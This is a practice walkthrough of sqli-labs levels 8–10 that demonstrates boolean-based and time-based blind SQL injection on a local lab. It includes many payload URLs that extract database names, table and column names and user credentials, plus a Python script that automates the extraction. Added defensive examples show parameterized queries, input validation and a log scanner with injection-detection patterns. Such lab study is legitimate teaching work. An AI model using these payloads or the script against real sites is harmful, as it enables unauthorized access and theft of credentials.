
sqli-labs practice notes (2): Less 8-10 (boolean-based blind injection, time-based blind injection)

Less8

Level eight again starts by looking at the normal state:

http://localhost/sqli-labs/Less-8/?id=1

Then close the string with a single quote:

http://localhost/sqli-labs/Less-8/?id=1'

The problem with this level is that errors are not displayed, so the updatexml trick from the previous article cannot be used. In this situation we need "blind injection", which plainly put means guessing, for example:

http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

Here we guess that the first letter of the database name is 's'. Of course we cannot read minds, so we will not guess right on the first try; in general each character has to be tried one by one. We can also borrow the idea of binary search: using greater-than and less-than comparisons, we determine and step by step narrow the range of the character, which reduces the number of queries.

In this way we can work out the current database. We must also first find the length of the string; once the length is known, each character is blind-guessed one at a time:

http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

After all of this, comparing character by character, we find the name is security. With the same method we can find that the fourth table in information_schema.tables is named users:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

The process of trying table by table and character by character is omitted here.

Then use the same method to blind-inject the column names:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd

After blind injection, the fourth and fifth column names match as username and password.

Then blind-inject the username and password:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd

ASCII codes are used for matching here because usernames and passwords are case-sensitive, while MySQL's default collation compares strings case-insensitively (so 'd'='D' is true and a plain character comparison cannot tell the two apart). The database, table and column names above could also have been matched by ASCII code. If the data itself is case-sensitive, matching must be done by ASCII code.
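As an added example (not from the original post, and not the lab's own PHP code), here is the Less-8 style id lookup written twice in Python over an in-memory SQLite table, so the boolean probe shown above can be run against both forms: string concatenation reproduces the true/false oracle, a bound parameter does not. The users rows are constructed here; the first account matches the ASCII values 68,117,109,98 ("Dumb") probed on this page, the second is invented.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab's users table (not the real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "example", "example")])
    return conn


def lookup_unsafe(conn, user_id):
    # Mirrors the lab: the parameter is pasted between single quotes, so a
    # quote in the input closes the literal and the remainder is parsed as SQL.
    # A "-- " comment then discards the original closing quote and LIMIT.
    sql = "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, user_id):
    # Placeholder binding: the whole input is a single value compared to id.
    # Nothing inside it is parsed as SQL, so no condition can be appended and
    # the probe string simply matches no row.
    row = conn.execute("SELECT username FROM users WHERE id=? LIMIT 1",
                       (user_id,)).fetchone()
    return row[0] if row else None


def is_valid_id(user_id):
    # Second layer: this endpoint only ever takes a positive integer, so reject
    # anything else before it reaches the database at all.
    return user_id.isdigit()
```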

Less9

Level nine is harder still: whatever closing you enter, the page returns the same thing. In other words, the response is identical whether the condition is right or wrong. What can be done in that case? This is where "time-based blind injection" comes in. The idea is: if the injected condition is true, sleep for a while; if it is false, return immediately. By observing whether the request is delayed, we can tell whether the preceding condition was true. The conditions themselves are the same ones used in level eight.

For example, when we enter:

http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1)  -- asd

The spinner in the browser tab turns for about 2 seconds, and in the browser developer tools (F12) you can see that the server waited 2 seconds before responding. That is time-based blind injection.

So the same statements can be used to find the database name:

http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd

Find the table name:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd

Find the column names:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd

Finally, find the username and password:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(password) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

Apart from wrapping each condition in if() with sleep(), this is essentially identical to level eight, so the results are not shown separately.

Time-based blind injection script

Trying by hand one character at a time is far too laborious unless you already know the answer, so a Python script can do the work:

import requests
import time

# Candidate characters for identifiers: digits, ':', upper-case, '_', lower-case.
db_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122]
user_pwd_ascii = []


def get_method(url_params):
    # Time one request; a response slower than 2 s means the injected
    # condition was true and sleep(2) ran.
    t1 = time.time()
    #print(url_params)
    r = requests.get('http://localhost/sqli-labs/Less-8', params=url_params)
    t2 = time.time()
    if t2 - t1 > 2:
        return True
    return False


def check_database():
    ## database name length
    database_len = 0
    for i in range(100):
        params = {'id': "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}
        if get_method(params):
            database_len = i
            print('database name length is: ' + str(database_len))
            break
    ## database name, one character at a time
    for j in range(database_len):
        for db_char in db_ascii:
            params = {'id': "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}
            if get_method(params):
                print(chr(db_char), end='')
                break
            time.sleep(0.05)
    print('')


def check_table():
    ## number of tables
    table_num = 0
    for i in range(100):
        num_params = {'id': "1' and if((select count(1) from information_schema.tables where table_schema=database())=" + str(i) + ", sleep(2),1) -- asd"}
        if get_method(num_params):
            table_num = i
            print('table number is: ' + str(table_num))
            break
    for k in range(table_num):
        ## table name length
        table_name_len = 0
        for l in range(100):
            tb_len_params = {'id': "1' and if((select LENGTH(table_name) from information_schema.tables where " +
                                    "table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(tb_len_params):
                table_name_len = l
                print('table name length is: ' + str(table_name_len))
                break
        ## table name
        for j in range(table_name_len):
            for tb_char in db_ascii:
                tb_name_params = {'id': "1' and if(ASCII(substr((select table_name from information_schema.tables " +
                                         "where table_schema=database() limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" + str(tb_char) + ", " +
                                         "sleep(2),1) -- asd"}
                if get_method(tb_name_params):
                    print(chr(tb_char), end='')
                    break
                time.sleep(0.05)
        print('')


def check_column(tb_name):
    ## number of columns
    col_num = 0
    for i in range(100):
        num_params = {'id': "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" +
                             str(i) + ", sleep(2),1) -- asd"}
        if get_method(num_params):
            col_num = i
            print('column number is: ' + str(col_num))
            break
    for k in range(col_num):
        ## column name length
        col_name_len = 0
        for l in range(100):
            col_len_params = {'id': "1' and if((select LENGTH(column_name) from information_schema.columns where " +
                                     "table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(col_len_params):
                col_name_len = l
                print('column name length is: ' + str(col_name_len))
                break
        ## column name
        for j in range(col_name_len):
            for col_char in db_ascii:
                col_name_params = {'id': "1' and if(ASCII(substr((select column_name from information_schema.columns " +
                                          "where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" +
                                          str(col_char) + ", sleep(2),1) -- asd"}
                if get_method(col_name_params):
                    print(chr(col_char), end='')
                    break
                time.sleep(0.05)
        print('')


def check_username_password(tb_name, username_col, password_col, start, end):
    for i in range(start, end):
        # username length
        username_len = 0
        for j in range(100):
            username_len_params = {'id': "1' and if((select LENGTH(" + username_col + ") from " + tb_name +
                                          " limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}
            if get_method(username_len_params):
                username_len = j
                print('username length is: ' + str(j))
                break
        # username: printable ASCII, so case is preserved
        for k in range(username_len):
            for username_char in range(33, 127):
                username_params = {'id': "1' and if(ASCII(substr((select " + username_col + " from " + tb_name +
                                          " limit " + str(i) + ",1), " + str(k + 1) + ", 1))=" + str(username_char) +
                                          ", sleep(2),1) -- asd"}
                if get_method(username_params):
                    print(chr(username_char), end='')
                    break
                time.sleep(0.05)
        print('')
        # password length
        password_len = 0
        for l in range(100):
            password_len_params = {'id': "1' and if((select LENGTH(" + password_col + ") from " + tb_name +
                                          " limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}
            if get_method(password_len_params):
                password_len = l
                print('password length is: ' + str(l))
                break
        # password
        for m in range(password_len):
            for password_char in range(33, 127):
                password_params = {'id': "1' and if(ASCII(substr((select " + password_col + " from " + tb_name +
                                          " limit " + str(i) + ",1), " + str(m + 1) + ", 1))=" + str(password_char) +
                                          ", sleep(2),1) -- asd"}
                if get_method(password_params):
                    print(chr(password_char), end='')
                    break
                time.sleep(0.05)
        print('')


if __name__ == '__main__':
    check_database()
    check_table()
    #check_column('users')
    #check_username_password('users', 'username', 'password', 0, 2)

This is a brute-force version; interested readers can write a binary-search version, which is faster. The functions that look up column names and usernames/passwords need the table and column names obtained by the earlier functions passed in as arguments.
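Seen from the server side, both the Less-8 loop and the Less-9 sleep() loop leave a very recognisable trail: one client sending dozens of requests whose id parameter carries substr/ASCII/LENGTH comparisons or if(...,sleep(n),...). As an added example (not part of the original post), here is a small log scanner that flags such clients; the access-log lines are constructed in common log format, and the signature lists and the threshold are my own assumptions to adapt to the application.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Fragments taken from the payload shapes on this page, matched against the
# decoded, lower-cased parameter value. Tune for your own application.
BOOLEAN_SIGS = [r"\bsubstr\s*\(", r"\bascii\s*\(", r"\blength\s*\(",
                r"information_schema", r"'\s*(and|or)\b"]
TIME_SIGS = [r"\bsleep\s*\(", r"\bbenchmark\s*\("]

# Common log format: ip ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (?:\d+|-)')


def classify_request(path):
    """Return 'time', 'boolean' or None for one request path including its query."""
    for values in parse_qs(urlsplit(path).query).values():
        for v in values:
            v = unquote_plus(v).lower()  # second decode catches double-encoded input
            if any(re.search(p, v) for p in TIME_SIGS):
                return "time"
            if any(re.search(p, v) for p in BOOLEAN_SIGS):
                return "boolean"
    return None


def scan_log(lines, min_probes=5):
    """Count suspicious requests per client IP and return those at or above min_probes.
    One hit may be a false positive; a run of them is the character-by-character
    guessing loop described above (threshold is an assumption)."""
    counts = defaultdict(lambda: {"boolean": 0, "time": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_request(m.group(2))
        if kind:
            counts[m.group(1)][kind] += 1
    return {ip: c for ip, c in counts.items() if c["boolean"] + c["time"] >= min_probes}


def log_line(ip, path):
    # Builds one constructed CLF line for the demo below.
    return f'{ip} - - [10/Oct/2023:12:00:00 +0000] "GET {path} HTTP/1.1" 200 512'


# Constructed sample: one client running the Less-8 loop, one running Less-9
# sleep() probes, and an ordinary visitor (all addresses are documentation ranges).
BOOL_PATHS = [f"/sqli-labs/Less-8/?id=1%27%20and%20substr(database(),{i},1)%3D%27x%27%20--%20asd"
              for i in range(1, 9)]
TIME_PATHS = [f"/sqli-labs/Less-9/?id=1%27%20and%20if(substr(database(),{i},1)%3D%27x%27,sleep(2),1)%20--%20asd"
              for i in range(1, 6)]
SAMPLE_LOG = ([log_line("203.0.113.5", "/sqli-labs/Less-8/?id=1")]
              + [log_line("203.0.113.5", p) for p in BOOL_PATHS]
              + [log_line("198.51.100.7", p) for p in TIME_PATHS]
              + [log_line("192.0.2.9", "/sqli-labs/Less-8/?id=2")])

if __name__ == "__main__":
    for ip, c in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {c['boolean']} boolean-based, {c['time']} time-based probes")
```

If the log also records response time, a second signal for Less-9 is a run of requests to the same path that each take about the sleep duration while the rest of the site answers in milliseconds.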

Less10

Level ten is identical to level nine except that the closing character becomes a double quote, so it is not written up separately.
